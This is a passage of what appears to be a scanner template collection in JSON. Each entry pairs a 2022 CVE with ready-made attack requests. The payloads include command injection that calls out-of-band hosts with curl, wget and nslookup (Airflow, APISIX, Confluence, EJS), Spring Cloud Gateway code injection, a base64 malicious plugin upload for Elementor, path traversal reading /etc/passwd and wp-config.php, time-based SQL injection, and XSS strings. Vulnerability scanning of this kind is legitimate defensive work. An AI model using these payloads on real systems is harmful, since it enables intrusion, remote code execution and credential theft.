\\\"uri\\\": \\\"/api/{{randstr}}\\\",\\r\\n \\\"upstream\\\":{\\\"type\\\":\\\"roundrobin\\\",\\\"nodes\\\":{\\\"httpbin.org:80\\\":1}}\\r\\n,\\r\\n\\\"filter_func\\\": \\\"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\\\"}\"\n    }\n  ]\n}\n","GET /api/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"reason\":\"OK\"","\"status\":200"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2022-26134","info":{"name":"Confluence - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/","{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["contains(to_lower(header_1), \"x-cmd-response:\")"]},{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(to_lower(response_2), \"confluence\")"],"condition":"and"}],"extractors":[{"type":"kval","kval":["x_cmd_response"],"part":"header"}]}]},{"id":"CVE-2022-37153","info":{"name":"Artica Proxy 4.30.000000 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /fw.login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password\" value=\"admin\"><script>alert(document.domain)</script>","Artica Web"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0422","info":{"name":"WordPress White Label CMS <2.2.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php?wlcms-action=preview HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nwlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(/XSS/);"]},{"type":"word","part":"body","words":["wlcms-login-wrapper"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0870","info":{"name":"Gogs <0.12.5 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/migrate HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/migrate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&clone_addr=https%3A%2F%2F{{interactsh-url}}&auth_username=&auth_password=&uid=1&repo_name={{randstr}}&description=test\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-40843","info":{"name":"Tenda AC1200 V-W15Ev2 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["GET /goform/downloadSyslog/syslog.log HTTP/1.1\nHost: {{Hostname}}\nCookie: W15Ev2_user=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["^0\\d{3}$"]},{"type":"word","part":"body","words":["[system]","[error]","[wan1]"],"condition":"or"},{"type":"word","part":"header","words":["Content-type: config/conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38794","info":{"name":"Zaver - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1170","info":{"name":"JobMonster < 4.5.2.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resumes/?s=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","noo-resume"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4140","info":{"name":"WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd","{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0760","info":{"name":"WordPress Simple Link Directory <7.7.2 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=qcopd_upvote_action&post_id=(SELECT 3 FROM (SELECT SLEEP(7))enz)\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200 || status_code == 500","contains(content_type, \"text/html\")","contains(body, \"vote_status\") || contains(body, \"critical error\")"],"condition":"and"}]}]},{"id":"CVE-2022-40881","info":{"name":"SolarView 6.00 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /network_test.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nhost=%0a{{cmd}}%0a&command=ping\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2863","info":{"name":"WordPress WPvivid Backup <0.9.76 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=WPvivid HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922 HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/wp-admin/admin.php?page=WPvivid\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"_ajax_nonce\":\"([0-9a-z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-29006","info":{"name":"Directory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DMS || Dashboard","DMS Admin","Admin Profile"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42233","info":{"name":"Tenda 11N - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /index.asp HTTP/1.1\nHost: {{Hostname}}\nCookie: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword","Tenda 11N"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["GoAhead-Webs"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0678","info":{"name":"Microweber <1.2.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","content=\"Microweber\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-40022","info":{"name":"Symmetricom SyncServer Unauthenticated - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /controller/ping.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/controller/ping.php\n\ncurrentTab=ping&refreshMode=&ethDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+)"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-47075","info":{"name":"Smart Office Web 20.28 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ExportReportingManager.aspx"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/CSV\")","contains(body, \"EmployeeName\") && contains(body, \"EmployeeCode\")"],"condition":"and"}]}]},{"id":"CVE-2022-1595","info":{"name":"WordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure","severity":"medium"},"requests":[{"raw":["HEAD /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nCookie: valid_login_slug=1\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains(header, 'wordpress_')","contains(header, 'Location')"],"condition":"and"}]}]},{"id":"CVE-2022-33119","info":{"name":"NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: \"><script>alert(document.domain)</script><\"\n\nlanguage=en&user=user&pass=pass&submit=Login\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code == 200","contains(body,'<script>alert(document.domain)</script><\\\"?cmd=')"],"condition":"and"}]}]},{"id":"CVE-2022-1329","info":{"name":"Elementor Website Builder - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=336b29d7aee0463d8b651303eab505ea\n\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"action\"\n\nelementor_upload_and_install_pro\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"_nonce\"\n\n{{nonce}}\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.zip\"\n\n{{base64_decode(\"UEsDBBQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAZWxlbWVudG9yLXByby9VVA0AB8csB2TILAdkxywHZHV4CwABBOgDAAAE6AMAAFBLAwQUAAgACAB8KGdWAAAAAAAAAAA6BAAAHwAgAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAKVSXU/bQBB8rn/FgqryoXyUoFZqKAUTnBCJhshxQKiq0Nlex6ee705354T8++45AfLQ9qVv9u3s7OzMfr3QpQ66x8cBHMNU1AsuYcIq7EMksELplIGpUb56jTYzXDuuZB+SEncQD5ha7hCuai5yNFAyC9wBE6IPuWELYDKnD6VBswVCuoG1QPNnFKDRFJg5yNHyhWxBpVIuEAxaraTlSwTMueNy0Wp4KmWwAyN0YB0zDnOQarW3o38ej/tQOqdtv9vFF5GdTFXdi9pVT1bVJsPzlW7rpsF+8K8ZqzSj+eebx3ZtePNe0fC68uic2dKPCWtXKrPjkKf2hXs0tnHntPO5c/IG/V9FrGH5uyI/KcFnB9eqYpzmv47YFi81y35556OdAlxmzOFCmTUMyNIt9C1UbqEwiGBV4VbM0EmsVQ0Zk5RMzq0zPK0pc5+zzLvUUKmcF2tPQm+19Ifg6EwcmsqCKpqf0WRO0Uk0TMC0TgXP4JZnKC0C3Yz2L7akSNOGx3cMvYbZVgMMFREzf4MtQE51A8uN63D6MmNL2ILNmkyuQdCmr8jOn1Z92ygHuiHPUypN6kvm/D4rLgSkCLXFohYt309geBgnN3fzBMLJIzyEcRxOksczAlNgVMUlbqh4pQUnZtrBMOnWJNUzfI/iwQ21hFfj23HySIJhOE4m0WwGw7sYQpiGcTIezG/DGKbzeHo3izowQ6/K5/UvN4smEHIsR8e4sH7pbhAEvIDDPW4tusP3T6Mo+XHAMseX5M/Bz6Oj4J1BVxt5FgSYlQqq/NPh/uA+avc+9nrtk9Pel/0jqgUX34LfUEsHCH5L6n9mAgAAOgQAAFBLAQIUAxQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAAAAAAAAAAAD9QQAAAABlbGVtZW50b3ItcHJvL1VUDQAHxywHZMgsB2THLAdkdXgLAAEE6AMAAAToAwAAUEsBAhQDFAAIAAgAfChnVn5L6n9mAgAAOgQAAB8AIAAAAAAAAAAAALSBTAAAAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAFBLBQYAAAAAAgACAMkAAAAfAwAAAAA=\")}}\n--336b29d7aee0463d8b651303eab505ea--\n","GET /index.php?activate=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["5f9bc5edd71c78284dabe630df8cd71d"]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["admin-ajax.php\",\"nonce\":\"([0-9a-zA-Z]+)\"}"],"internal":true}]}]},{"id":"CVE-2022-1391","info":{"name":"WordPress Cab fare calculator < 1.0.4 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34328","info":{"name":"PMB 7.3.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>' target='cart_info"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1119","info":{"name":"WordPress Simple File List <3.2.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0653","info":{"name":"Wordpress Profile Builder Plugin Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"javascript:alert(document.domain);\">here</a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28117","info":{"name":"Navigate CMS 2.9.4 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------123456789012345678901234567890\n\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-username\"\n\n{{username}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf_token}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-password\"\n\n{{password}}\n-----------------------------123456789012345678901234567890\n","POST /navigate/navigate.php?fid=dashboard&act=json&oper=feed HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlimit=5&language=en&url=file:///etc/passwd\n","GET /navigate/private/1/cache/0f1726ba83325848d47e216b29d5ab99.feed HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["csrf_token\" value=\"([a-f0-9]{64})"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-36804","info":{"name":"Atlassian Bitbucket - Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /rest/api/latest/repos HTTP/1.1\nHost: {{Hostname}}\n","GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"iterate-all":true,"matchers-condition":"and","matchers":[{"type":"word","words":["com.atlassian.bitbucket.scm.CommandFailedException"]},{"type":"status","status":[500]}],"extractors":[{"type":"json","name":"key","internal":true,"json":[".[\"values\"] | .[] | .[\"project\"] | .key"],"part":"body"},{"type":"json","name":"slug","internal":true,"json":[".[\"values\"] | .[]  | .slug"],"part":"body"},{"type":"regex","group":1,"regex":["uid=.*\\(([a-z]+)\\):"]}]}]},{"id":"CVE-2022-0201","info":{"name":"WordPress Permalink Manager <2.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(/XSS/)>","pm_query"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-3484","info":{"name":"WordPress WPB Show Core - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"wpb_jplayer_setting\")","contains(body, \"<script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-34093","info":{"name":"Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/access_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"%3Cscript%3Ealert(document.domain)%3C/script%3E\", \"Invalid consumer key\")"],"condition":"and"}]}]},{"id":"CVE-2022-29078","info":{"name":"Node.js Embedded JavaScript 3.1.6 - Template Injection","severity":"critical"},"requests":[{"raw":["GET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["You are viewing page number"]}]}]},{"id":"CVE-2022-24716","info":{"name":"Icinga Web 2 - Arbitrary File Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0148","info":{"name":"WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(`document.domain`) x\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0288","info":{"name":"WordPress Ad Inserter <2.7.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"body":"html_element_selection=</script><img+src+onerror=alert(document.domain)>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","ad-inserter"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44356","info":{"name":"WAVLINK Quantum D4G (WL-WN531G3) - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["contains(body, \"WN531G3\")"],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportLogs.sh"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"Login=\", \"Password=\", \"WiFi_\", \"WAVLINK\")","contains_all(header, \"application/octet-stream\", \"filename=\\\"\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-31260","info":{"name":"ResourceSpace - Metadata Export","severity":"medium"},"requests":[{"raw":["GET /pages/csv_export_results_metadata.php?k=zulu&personaldata=0&allavailable=true&submit=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_any(body, \"CSV-Export -\", \"pagename=\\\"csv_export_results_metadata\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-28079","info":{"name":"College Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/asign-single-student-subjects.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubmit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5({{num}})}}"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-32195","info":{"name":"Open edX <2022-06-06 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"+8\"onmouseover=\"alert(document.domain)\">click here to go to"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24223","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nemail={{randstr}}@gmail.com'+AND+(SELECT+2549+FROM+(SELECT(SLEEP(6)))LIzI)+AND+'uqzM'='uqzM&password={{randstr}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Admin Login\") && contains(body, \"Atom.SaveOnBlur\")"],"condition":"and"}]}]},{"id":"CVE-2022-33965","info":{"name":"WordPress Visitor Statistics <=5.7 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"regex","regex":["^1331' and sleep\\(7\\) or '$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40127","info":{"name":"AirFlow < 2.4.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&_csrf_token={{csrf_token}}\n","@timeout: 15s\nPOST /api/v1/dags/example_bash_operator/dagRuns HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"conf\": {\n\"dag_run\": \"{{randstr}}\"\n},\n  \"dag_run_id\": \"id \\\"&& curl `whoami`.{{interactsh-url}}\",\n  \"logical_date\": \"{{date_time(\"%Y-%M-%D\")}}T{{date_time(\"%H:%m:%s\")}}.920Z\"\n\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["state\": \"queued\""]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2022-44951","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/forms&action=save_tab&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&entities_id=24&name=%3cscript%3ealert(document.domain)%3c%2fscript%3e&description=\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-22947","info":{"name":"Spring Cloud Gateway Code Injection","severity":"critical"},"requests":[{"raw":["POST /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"predicates\": [\n    {\n      \"name\": \"Path\",\n      \"args\": {\n        \"_genkey_0\": \"/{{randstr}}/**\"\n      }\n    }\n  ],\n  \"filters\": [\n    {\n      \"name\": \"RewritePath\",\n      \"args\": {\n        \"_genkey_0\": \"#{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")}\",\n        \"_genkey_1\": \"/${path}\"\n      }\n    }\n  ],\n  \"uri\": \"{{RootURL}}\",\n  \"order\": 0\n}\n","POST /actuator/gateway/refresh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"predicate\": \"Paths: [/{{randstr}}], match trailing slash: true\",\n  \"route_id\": \"{{randstr}}\",\n  \"filters\": [\n    \"[[RewritePath #{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")} = /${path}], order = 1]\"\n  ],\n  \"uri\": \"{{RootURL}}\",\n  \"order\": 0\n}\n","DELETE /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/routes/{{randstr}}"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2022-3062","info":{"name":"Simple File List < 4.4.12 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/?page=ee-simple-file-list&tab=settings&subtab=\"style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, 